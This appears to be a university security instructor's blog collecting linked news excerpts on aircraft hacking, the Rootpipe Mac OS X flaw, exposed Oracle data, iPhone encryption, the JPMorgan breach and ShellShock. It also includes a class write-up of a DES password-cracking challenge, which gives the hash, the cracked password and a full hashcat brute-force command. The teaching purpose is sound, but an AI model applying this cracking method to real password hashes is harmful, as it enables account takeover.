Hacking aircraft: Remote control

How realistic is it for computer hackers to interfere with aircraft while they are in the air, a phenomenon known as cyberjacking? It partly depends on terminology. Hijacking and fully controlling an aircraft by remote means borders on the impossible, according to David Stupples of City University in London, a specialist in communications. But interfering with an aircraft’s systems, including inducing a catastrophic failure, in order to extort money is a distinct possibility, he warns.

There are two ways this could be done, one more likely than the other. The first is a cyber attack from the outside. Passengers increasingly demand internet connectivity for work, games, movies and the like. But drilling holes in fuselages for additional antennae is costly and inefficient. So internet signals are routed through existing communications architecture, such as the Aircraft Communications Addressing and Reporting System (ACARS), which is used for short messages, or the Automatic Dependent Surveillance-Broadcast (ADS-B), an anti-collision system. As these both send and receive information they can, in theory, be targetted. When aircraft become more connected to the wider world they begin to look, electronically at least, like fixed structures. If banks can be hacked, why not aircraft?

via Hacking aircraft: Remote control | The Economist.

Unpatched bug in Mac OS X gives root access to untrusted people

Garrett McCarty from COMP/IT 424 pointed this out:

An unpatched vulnerability in Yosemite and some earlier versions of Apple’s Mac OS X allows untrusted people to take full control of users’ machines, a security researcher has warned.

Dubbed Rootpipe, the privilege escalation bug allows people to gain root access, a nearly unrestricted level of system privileges, without first entering the “sudo” password, according to a recent report published by MacWorld. Sudo is a mechanism that’s designed to prevent code execution, file deletions, and other sensitive operations from being carried out by unauthorized people who have physical access to a computer.

“Normally there are ‘sudo’ password requirements, which work as a barrier, so the admin can’t gain root access without entering the correct password,” Emil Kvarnhammar, a researcher at Swedish security firm Truesec, told Macworld. “It took a few days of binary analysis to find the flaw, and I was pretty surprised when I found it.”

via Unpatched bug in Mac OS X gives root access to untrusted people | Ars Technica.

Stop worrying about mastermind hackers. Start worrying about the IT guy.

Mistakes in setting up popular office software have sent information about millions of Americans spilling onto the Internet, including Social Security numbers of college students, the names of children in Texas and the ID numbers of intelligence officials who visited a port facility in Maryland.

The security problem, researchers say, has affected many hundreds of servers running popular Oracle software, exposing a peculiar melange of data to possible collection by hackers. Most of the institutions affected have been universities or government agencies, though they hold a wide range of information on individuals and private companies.

The UCLA Health system, for example, had communications records — including doctors’s names, e-mail addresses and phone numbers — visible online. The Pentagon’s Defense Information Systems Agency, which maintains secure military networks, exposed a contracting database appearing to show $164 million in purchases. Two Texas state agencies failed to protect the personal details of people receiving government services.

This was not the work of sophisticated Russian hackers or Chinese cyber-warriors, who typically get blamed for problems in computer networks. Instead, researchers are pointing to humble system administrators for making routine errors that left the data unsecured.

via Stop worrying about mastermind hackers. Start worrying about the IT guy. – The Washington Post.

A Few Thoughts on Cryptographic Engineering: Why can’t Apple decrypt your iPhone?

A former student of mine, Kanishka Goel, has pointed out this interesting article:

Last week I wrote about Apple’s new default encryption policy for iOS 8. Since that piece was intended for general audiences, I mostly avoided technical detail. But since some folks (and apparently the Washington Post!) are still wondering about the nitty-gritty details of Apple’s design might work, I thought it might be helpful to sum up what we know and noodle about what we don’t.

To get started, it’s worth pointing out that disk encryption is hardly new with iOS 8. In fact, Apple’s operating system has enabled some form of encryption since before iOS 7. What’s happened in the latest update is that Apple has decided to protect much more of the interesting data on the device under the user’s passcode. This includes photos and text messages — things that were not previously passcode-protected, and which police very much want access to.

via A Few Thoughts on Cryptographic Engineering: Why can’t Apple decrypt your iPhone?.

You can read more about Apple iOS Security here.

DES password challenge in COMP424

The password challenge in COMP/IT 424, the “Security” course that I am currently teaching at Channel Islands, was to find the crypt() password corresponding to the hash:

3zLNGMUzkNwak

The winner of the challenge was Jesse Thomas, here is the password:

h7vy09s1

and here is Jesse’s approach in his own words:

I decided to try ocl hashcat to crack the password. Since we were told that the password would be entropic, I figured we'd have to try a brute force attack. At first I was attempting to use all 94 potential characters but after seeing that it was estimated to take around 10 years to search through them all for a password length of 8 characters, I chose to search for only passwords matching lowercase characters and digits (like the previous challenge shown in class). The attempt took 4 hours and 48 minutes to complete, using a single nVidia GeForce GTX 560 Ti, which ran at a speed of 19739 kH/s (hash calculations/sec). At the time the password was cracked, hashCat had checked 341256962048 of 2821109907456 (32^8) potential combinations, so the password was found relatively early in the search algorithm (about 12% exhausted).

I used this command (in Windows, where I had a stronger video card):

cudaHashcat64.ex -m 1500 -a 3 -o cracked.txt "3zLNGMUzkNwak" -1 ?l?d ?1?1?1?1?1?1?1?1

-m specifies the hash type. 1500 is for descrypt/DES.
-a 3 specifies a brute force attack
 "-1 ?l?d" specifies a custom mask with the characteristic of being lowercase and digits only
"?1?1?1?1?1?1?1?1" specifies that there will be 8 characters in the password. Tried after it failed to find anything for length <= 7

cracked_pw

JPMorgan Discovers Further Cyber Security Issues – NYTimes.com

For the second time in roughly three months, JPMorgan Chase is scrambling to contain the fallout from a security breach of its vast computer network, according to several people with knowledge of the investigation.

JPMorgan, the nation’s largest bank, recently found that hackers, with links to Italy or southern Europe, had gained entry to some of the bank’s servers, these people said. The discovery follows an attack that was uncovered in late July and suggests that it was more extensive than first thought. In that attack, hackers obtained entry to dozens of the bank’s servers and reviewed information on more than one million customer accounts. Security experts briefed on the matter had said that the full extent of the July attack was not known and that it could take the bank months to discover all of the fallout.

via JPMorgan Discovers Further Cyber Security Issues – NYTimes.com.

ShellShock: All you need to know about the Bash Bug vulnerability | Symantec Connect

A new vulnerability has been found that potentially affects most versions of the Linux and Unix operating systems, in addition to Mac OS X which is based around Unix. Known as the “Bash Bug” or “ShellShock,” the GNU Bash Remote Code Execution Vulnerability CVE-2014-6271 could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating system will then run.

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received.

Symantec regards this vulnerability as critical, since Bash is widely used in Linux and Unix operating systems running on Internet-connected computers, such as Web servers. Although specific conditions need to be in place for the bug to be exploited, successful exploitation could enable remote code execution. This could not only allow an attacker to steal data from a compromised computer, but enable the attacker to gain control over the computer and potentially provide them with access to other computers on the affected network.

via ShellShock: All you need to know about the Bash Bug vulnerability | Symantec Connect.

Cybersecurity hiring crisis: Rockstars, anger and the billion dollar problem

At no time in history has there been a greater need to hire security professionals to protect and defend infrastructures from an inexhaustible onslaught of organized crime, industrial espionage, and nation-state attacks.A small talent pool, an inflated wage bubble and the high tensions of a virulent attack landscape have made cybersecurity’s hiring crisis the “billion dollar” problem.

via Cybersecurity hiring crisis: Rockstars, anger and the billion dollar problem | ZDNet.